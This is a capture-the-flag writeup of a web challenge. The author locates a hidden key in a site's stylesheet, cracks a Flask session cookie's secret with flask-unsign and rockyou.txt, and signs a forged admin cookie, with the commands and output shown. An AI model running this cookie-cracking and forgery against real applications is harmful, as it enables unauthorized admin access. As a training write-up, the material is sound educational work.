CTF Writeup – Chocolates – mhsctf2023

CTF Writeup by Frigyes

Intro

Name: Feb. 2 – Chocolates
Category: Web
Description: The first thing I want to give everyone is chocolate, of course. I found this wonderful company that sells the most exquisite chocolates, but I heard that they sell a super special secret valentine chocolate that’s hidden somewhere on their website. Here’s the website, do you think you can find it for me?
https://chocolates-mhsctf.0xmmalik.repl.co

First, lets open the site and see what we have:

Chocolates website on 02/03/2023

Hmmm… Nothing on the UI. The links in purple just take you to different sections on the website:

Chocolates website on 02/03/2023

Time to dig deeper!

First, I decided to open page source, maybe we find some juicy details hidden in the HTML file.

Chocolates website on 02/03/2023

Hidden page? I wonder what that does!

Chocolates website on 02/03/2023

I need a key? I need a key! But where do I get myself a key? Let’s keep digging in the source files for the website. I opened up the inspect tool to start looking around. When I opened the style page: BAM! It was staring at me!

Chocolates website on 02/03/2023

So my key is: ?key=thedarkestchocolate
Let’s try it!

Chocolates website on 02/03/2023

Admin? Me? Of course! *click*

Chocolates website on 02/03/2023

IMPOSTOR?!??!? SUS?

Okay, let’s see what’s going on in here… Changing the key in the URL yields the same page for everything except “anotherkeylol”:

Chocolates website on 02/03/2023

What button? Anyways. Because the only different page (The impostor!!! (amogus (sus))) loaded for key=anotherkeylol, I’m assuming that’s the correct key. Also the CTF admins said don’t brute force the URLs after giving us rockyou.txt… But let’s keep digging!

Cookies for the cookie monster

Back to the inspect tool. I notice two things: First, the page sends code 400 instead of 200. Curious…

Chocolates website on 02/03/2023

Second, we have a session cookie:

Chocolates website on 02/03/2023

When we decode it, it’s a JWT, but it has something that looks like gibberish at the end of it…

“admin” : “false” hmmmm, what about “admin” : “true”?

Chocolates website on 02/03/2023

Ha! Not that easy! After a bit of googling, I learned about Flask session cookies and flask-unsign. I went ahead and installed flask-unsign, and downloaded rockyou.txt as provided by the organizers. Next, I tried running the cookie trough flask-unsign:

[frigyes@archlaptop ~]$ flask-unsign --unsign --cookie eyJhZG1pbiI6ImZhbHNlIn0.Y90p2g.cmhYNYHl-Oj5C-oH90HIsf3wCbM --no-literal-eval --wordlist ./Desktop/my_site/ctf/rockyou.txt
[*] Session decodes to: {'admin': 'false'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 11648 attempts
b'BATMAN'

Yay! A secret key! Now I just need to encode the new cookie with the “secret” key:

[frigyes@archlaptop ~]$ flask-unsign --sign --cookie "{'admin': 'true'}" --secret 'BATMAN'
eyJhZG1pbiI6InRydWUifQ.Y90qig.fqQzzWzIdwF3Ih1AJKV__E_ezqA

I paste it into my session cookie, and sure enough:

Chocolates website on 02/03/2023

Flag: valentine{1ts_jus7_100%_cacao}

If you liked this writeup, you might also like: The Numbers – PicoCTF writeup

Leave a Reply

Your email address will not be published. Required fields are marked *